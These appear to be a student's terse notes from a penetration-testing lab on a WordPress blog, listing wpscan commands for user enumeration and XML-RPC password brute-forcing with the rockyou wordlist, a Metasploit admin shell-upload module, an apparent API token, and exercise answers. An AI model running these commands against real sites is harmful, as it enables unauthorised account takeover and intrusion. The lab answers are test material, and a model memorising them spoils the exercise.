Vulns repartition:
wpscan --password-attack xmlrpc -t 20 -U john -P /usr/share/wordlists/rockyou.txt --url <http://blog.inlanefreight.local>
exploit/unix/webapp/wp_admin_shell_upload
Perform user enumeration against http://blog.inlanefreight.local. Aside from admin, what is the other user present?
wpscan --url <http://blog.inlanefreight.local> --enumerate u --api-token LtsnapV74hG8S8z2Dfua9hx8VtvLiacQM4Hd4rtqaWE
→ doug
Perform a login bruteforcing attack against the discovered user. Submit the user's password as the answer.